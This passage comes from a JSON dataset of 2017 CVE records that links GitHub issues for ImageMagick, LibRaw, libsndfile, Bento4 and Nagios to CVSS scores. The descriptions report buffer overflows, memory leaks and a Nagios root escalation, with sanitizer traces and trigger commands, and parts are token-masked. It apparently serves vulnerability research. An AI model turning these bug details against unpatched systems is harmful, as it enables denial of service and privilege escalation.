  8796. "description": "two loagic bugs in latest product. Hello Developers,i has find two logic bugs in your product\uff0cwhich maybe cause some problems I hope this helps you. the first point: at FILETAG line NUMBERTAG APITAG Here, you use the same password for testing the Second point: at FILETAG line NUMBERTAG APITAG , Let's follow up this function FILETAG line NUMBERTAG ERRORTAG Let's follow up Typo::strip FILETAG line NUMBERTAG ERRORTAG We can see that the regular expressions here are removed from the corner brackets for example:if username is APITAG then the function will return admin . But finally, the data does not check the same name before entering the database. so it will cause a large problem we can block any member's account if we know his username. why? because in FILETAG line NUMBERTAG c NUMBERTAG because there are two There are two users called admin That's what I want to say. If I don't make it clear, please contact me",
  8797. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  8798. "severity": "MEDIUM",
  8799. "baseScore": 5.3,
  8800. "impactScore": 1.4,
  8801. "exploitabilityScore": 3.9
  8802. },
  8803. {
  8804. "CVE_ID": "CVE-2017-14245",
  8805. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/317",
  8806. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/317",
  8807. "Repo_new": "libsndfile/libsndfile",
  8808. "Issue_Created_At": "2017-09-12T02:47:14Z",
  8809. "description": "APITAG confusion in . function APITAG in ulaw.c and d2ulaw_array (const double ptr, int count, unsigned char buffer, double normfact) { while ( count NUMBERTAG if (ptr [count NUMBERTAG buffer [count] = ulaw_encode [lrint (normfact ptr [count])] ; else buffer [count NUMBERTAG F & ulaw_encode [ lrint (normfact ptr [count])] ; } ; } / d2ulaw_array /",
  8810. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  8811. "severity": "HIGH",
  8812. "baseScore": 8.1,
  8813. "impactScore": 5.2,
  8814. "exploitabilityScore": 2.8
  8815. },
  8816. {
  8817. "CVE_ID": "CVE-2017-14248",
  8818. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/717",
  8819. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/717",
  8820. "Repo_new": "imagemagick/imagemagick",
  8821. "Issue_Created_At": "2017-09-01T04:37:53Z",
  8822. "description": "A heap buffer overflow in function APITAG in resize.c. A bug was triggered when convert a file to pdf using APITAG , I use the command line \" ./magick convert pdf.poc FILETAG \" and the asan shows NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f6b7aafeb NUMBERTAG at pc NUMBERTAG d1d NUMBERTAG c bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG sp NUMBERTAG ffc NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f6b7aafeb NUMBERTAG thread T NUMBERTAG d1d NUMBERTAG b in APITAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG edef1 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ff in APITAG PATHTAG NUMBERTAG a2a NUMBERTAG d in APITAG PATHTAG NUMBERTAG eb5a6a in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f6b7e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG NUMBERTAG f6b7aafeb NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e2c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG b NUMBERTAG c in APITAG PATHTAG NUMBERTAG cc NUMBERTAG in APITAG PATHTAG NUMBERTAG d2a NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG a4 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG f in APITAG PATHTAG NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f6b7e NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING The poc was at: URLTAG Note that this issue was found by lifuhao from Aliyun Security Team.",
  8823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8824. "severity": "MEDIUM",
  8825. "baseScore": 6.5,
  8826. "impactScore": 3.6,
  8827. "exploitabilityScore": 2.8
  8828. },
  8829. {
  8830. "CVE_ID": "CVE-2017-14249",
  8831. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/708",
  8832. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/708",
  8833. "Repo_new": "imagemagick/imagemagick",
  8834. "Issue_Created_At": "2017-08-31T03:50:27Z",
  8835. "description": "\"FPE on unknown address\" error when converting to pdf . Hello , this is the first time I post a bug. I use AFL with Asan to test APITAG and find a crash in APITAG when converting file to pdf. My command line: ./magick convert poc out.pcd The Asan shows: ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG pc NUMBERTAG c8ae1 bp NUMBERTAG c4a NUMBERTAG a NUMBERTAG sp NUMBERTAG ffcdaf8f NUMBERTAG T NUMBERTAG c8ae0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG aea in APITAG PATHTAG NUMBERTAG ac5ed2 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG ff in APITAG PATHTAG NUMBERTAG a2a NUMBERTAG d in APITAG PATHTAG NUMBERTAG eb5a6a in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG FPE PATHTAG in APITAG NUMBERTAG ABORTING And the poc: URLTAG Thank you",
  8836. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8837. "severity": "MEDIUM",
  8838. "baseScore": 6.5,
  8839. "impactScore": 3.6,
  8840. "exploitabilityScore": 2.8
  8841. },
  8842. {
  8843. "CVE_ID": "CVE-2017-14257",
  8844. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/181",
  8845. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/181",
  8846. "Repo_new": "axiomatic-systems/bento4",
  8847. "Issue_Created_At": "2017-09-08T10:29:00Z",
  8848. "description": "Multiple Exploitable and Non Exploitable issues Identified. Exploitable Write Access Violation: APITAG APITAG FILETAG",
  8849. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8850. "severity": "HIGH",
  8851. "baseScore": 7.8,
  8852. "impactScore": 5.9,
  8853. "exploitabilityScore": 1.8
  8854. },
  8855. {
  8856. "CVE_ID": "CVE-2017-14265",
  8857. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/99",
  8858. "Issue_Url_new": "https://github.com/libraw/libraw/issues/99",
  8859. "Repo_new": "libraw/libraw",
  8860. "Issue_Created_At": "2017-09-08T09:02:39Z",
  8861. "description": "A Stack Buffer Overflow was discovered in APITAG A Stack Buffer Overflow was discovered in APITAG APITAG It could allow remote denial of service and code execution attack. command to reproduce: APITAG the latest version is vulnerable. other versions may also be affected. the sanitizer output: ERRORTAG in APITAG , color was defined as: APITAG with the input testcase in gdb, we could see that the h is NUMBERTAG which leads stack overflow CODETAG",
  8862. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  8863. "severity": "CRITICAL",
  8864. "baseScore": 9.8,
  8865. "impactScore": 5.9,
  8866. "exploitabilityScore": 3.9
  8867. },
  8868. {
  8869. "CVE_ID": "CVE-2017-14312",
  8870. "Issue_Url_old": "https://github.com/NagiosEnterprises/nagioscore/issues/424",
  8871. "Issue_Url_new": "https://github.com/nagiosenterprises/nagioscore/issues/424",
  8872. "Repo_new": "nagiosenterprises/nagioscore",
  8873. "Issue_Created_At": "2017-08-30T12:27:48Z",
  8874. "description": "Root privilege escalation via insecure executable/config permissions. This is still a work in progress; our Nagios installation is pretty simple so I'll have to do some testing to make sure none of my proposed solutions break things. Problem When Nagios is configured, the user and group under which it will run are chosen: CODETAG Both default to \"nagios\" the following is from APITAG : CODETAG Immediately after those two lines, this appears: APITAG Those APITAG are then used in every invocation of the install command during installation. This can lead to a root exploit in at least two ways. The fundamental problem is that the nagios daemon is intended to be launched as root, but the daemon itself and some critical configuration files are writable (in an exploitable way) by the restricted nagios user NUMBERTAG The binary for the daemon itself, i.e. APITAG is owned by the APITAG , but will be run as root. The APITAG can overwrite that binary with whatever he wants, and root will run it NUMBERTAG The configuration file APITAG specifies the user and group that nagios will run as, but is owned by that same APITAG . He can edit APITAG himself, and set APITAG , APITAG . The command definition file APITAG is also owned by APITAG , and he can place whatever commands in there he likes. Considering that the daemon will run as root the next time it is launched, this will also let the APITAG gain root eventually. Resolution At the very least, APITAG and the executables must not be writable by anyone other than root. To ensure that the executables aren't owned by the nagios user, it suffices to set APITAG in APITAG and APITAG . For the configuration file, I'm not so sure: is there a reason for the other configs (besides APITAG ) to be owned by the APITAG and APITAG ?",
  8875. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  8876. "severity": "HIGH",
  8877. "baseScore": 7.8,
  8878. "impactScore": 5.9,
  8879. "exploitabilityScore": 1.8
  8880. },
  8881. {
  8882. "CVE_ID": "CVE-2017-14324",
  8883. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/739",
  8884. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/739",
  8885. "Repo_new": "imagemagick/imagemagick",
  8886. "Issue_Created_At": "2017-09-08T09:44:06Z",
  8887. "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : URLTAG trigger command : ./magick convert im_poc NUMBERTAG dev/null detail : APITAG APITAG PATHTAG ./magick convert im_poc NUMBERTAG dev/null convert: improper image header ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG effb NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG effb6b3b NUMBERTAG in APITAG APITAG NUMBERTAG effb6b3b NUMBERTAG a in APITAG APITAG NUMBERTAG effb6c6d0ce in APITAG APITAG NUMBERTAG effb6d NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG ce6b0 in APITAG APITAG NUMBERTAG effb NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG dacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG effb NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
  8888. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8889. "severity": "MEDIUM",
  8890. "baseScore": 6.5,
  8891. "impactScore": 3.6,
  8892. "exploitabilityScore": 2.8
  8893. },
  8894. {
  8895. "CVE_ID": "CVE-2017-14325",
  8896. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/741",
  8897. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/741",
  8898. "Repo_new": "imagemagick/imagemagick",
  8899. "Issue_Created_At": "2017-09-08T09:44:18Z",
  8900. "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert APITAG output.mpc ./magick convert output.mpc output.art detail : APITAG APITAG PATHTAG ./magick convert APITAG output.mpc PATHTAG ./magick convert output.mpc output.art APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG faa NUMBERTAG f NUMBERTAG in posix_memalign ( PATHTAG NUMBERTAG faa NUMBERTAG c NUMBERTAG d in APITAG APITAG NUMBERTAG faa NUMBERTAG a3edcc in APITAG APITAG NUMBERTAG faa NUMBERTAG a3ea NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG bdbc NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG e7c NUMBERTAG f in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG b0 in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG acd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG faa NUMBERTAG aae NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG faa NUMBERTAG e NUMBERTAG in malloc ( PATHTAG NUMBERTAG faa NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG faa NUMBERTAG a3eebd in APITAG APITAG NUMBERTAG faa NUMBERTAG a3ea NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG bdbc NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG e7c NUMBERTAG f in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG b0 in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG acd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG faa NUMBERTAG aae NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
  8901. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8902. "severity": "MEDIUM",
  8903. "baseScore": 6.5,
  8904. "impactScore": 3.6,
  8905. "exploitabilityScore": 2.8
  8906. },
  8907. {
  8908. "CVE_ID": "CVE-2017-14326",
  8909. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/740",
  8910. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/740",
  8911. "Repo_new": "imagemagick/imagemagick",
  8912. "Issue_Created_At": "2017-09-08T09:44:12Z",
  8913. "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert im_poc NUMBERTAG mat /dev/null detail : APITAG APITAG PATHTAG ./magick im_poc NUMBERTAG mat /dev/null lt magick: multi dimensional matrices are not supported APITAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG cb9a in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e4 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fdb NUMBERTAG in posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG b1 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c9 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG fb in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e6 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
  8914. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8915. "severity": "MEDIUM",
  8916. "baseScore": 6.5,
  8917. "impactScore": 3.6,
  8918. "exploitabilityScore": 2.8
  8919. },
  8920. {
  8921. "CVE_ID": "CVE-2017-14341",
  8922. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/654",
  8923. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/654",
  8924. "Repo_new": "imagemagick/imagemagick",
  8925. "Issue_Created_At": "2017-08-06T13:51:09Z",
  8926. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
  8927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8928. "severity": "MEDIUM",
  8929. "baseScore": 6.5,
  8930. "impactScore": 3.6,
  8931. "exploitabilityScore": 2.8
  8932. },
  8933. {
  8934. "CVE_ID": "CVE-2017-14342",
  8935. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/650",
  8936. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/650",
  8937. "Repo_new": "imagemagick/imagemagick",
  8938. "Issue_Created_At": "2017-08-05T17:16:36Z",
  8939. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory exhaustion vulnerability was found in function APITAG which allow attackers to cause a denial of service via a crafted file. ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
  8940. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8941. "severity": "MEDIUM",
  8942. "baseScore": 6.5,
  8943. "impactScore": 3.6,
  8944. "exploitabilityScore": 2.8
  8945. },
  8946. {
  8947. "CVE_ID": "CVE-2017-14343",
  8948. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/649",
  8949. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/649",
  8950. "Repo_new": "imagemagick/imagemagick",
  8951. "Issue_Created_At": "2017-08-05T15:09:44Z",
  8952. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
  8953. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8954. "severity": "MEDIUM",
  8955. "baseScore": 6.5,
  8956. "impactScore": 3.6,
  8957. "exploitabilityScore": 2.8
  8958. },
  8959. {
  8960. "CVE_ID": "CVE-2017-14348",
  8961. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/100",
  8962. "Issue_Url_new": "https://github.com/libraw/libraw/issues/100",
  8963. "Repo_new": "libraw/libraw",
  8964. "Issue_Created_At": "2017-09-12T06:43:06Z",
  8965. "description": "Heap buffer overflow in APITAG Sample: CVETAG Credit: Henri Salo from Nixu Corporation Tools: afl NUMBERTAG b, afl utils, GCC APITAG ~~~ ./raw identify APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ee NUMBERTAG at pc NUMBERTAG febd8ff NUMBERTAG d bp NUMBERTAG ffc NUMBERTAG c NUMBERTAG e NUMBERTAG sp NUMBERTAG ffc NUMBERTAG c NUMBERTAG e NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ee NUMBERTAG thread T NUMBERTAG febd8ff NUMBERTAG c in APITAG int, unsigned char , unsigned int) APITAG NUMBERTAG febd NUMBERTAG da9 in APITAG int) APITAG NUMBERTAG febd NUMBERTAG de NUMBERTAG in APITAG APITAG NUMBERTAG febd NUMBERTAG f3fd in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG d7ea in APITAG APITAG NUMBERTAG febd NUMBERTAG b0cc in APITAG APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG c6 in APITAG ) APITAG NUMBERTAG febd NUMBERTAG be1b2 in APITAG const , long long) APITAG NUMBERTAG a9 in main samples/raw APITAG NUMBERTAG febd NUMBERTAG db NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG ee NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG febd NUMBERTAG cb NUMBERTAG f in malloc ( PATHTAG NUMBERTAG febd NUMBERTAG b NUMBERTAG b in APITAG long) APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG b in APITAG long) APITAG NUMBERTAG febd NUMBERTAG d5e in APITAG int) APITAG NUMBERTAG febd NUMBERTAG de NUMBERTAG in APITAG APITAG NUMBERTAG febd NUMBERTAG f3fd in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in 